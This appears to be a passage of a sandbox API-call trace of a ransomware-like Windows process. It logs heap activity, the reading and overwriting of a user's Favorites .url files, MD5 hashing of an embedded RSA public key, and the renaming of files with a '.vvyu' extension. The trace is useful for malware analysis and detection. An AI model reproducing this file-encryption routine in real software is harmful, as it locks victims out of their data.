HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3df8 | out: hHeap=0x2c0000) returned 1 [0193.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.223] WriteFile (in: hFile=0x584, lpBuffer=0x2adfe08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2adfe08*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0193.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.223] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.224] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0193.225] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.225] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.225] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.225] CloseHandle (hObject=0x584) returned 1 [0193.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0193.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.227] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url.vvyu")) returned 1 [0193.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.229] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0193.232] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0193.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0193.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.232] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0193.232] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.234] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=134) returned 1 [0193.234] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.237] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.238] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.239] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.239] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x86, lpOverlapped=0x0) returned 1 [0193.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.239] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.240] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.240] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.241] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.241] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.241] GetLastError () returned 0x0 [0193.241] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.241] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.241] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.241] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.241] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.241] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3df8 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3e40 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.242] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62d8 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae62c0 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0193.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.246] GetCurrentThreadId () returned 0x5d8 [0193.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae79f8 [0193.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0193.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.247] GetCurrentThreadId () returned 0x5d8 [0193.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0193.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62d8 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6338 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6350 [0193.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62f0 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62c0 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.251] 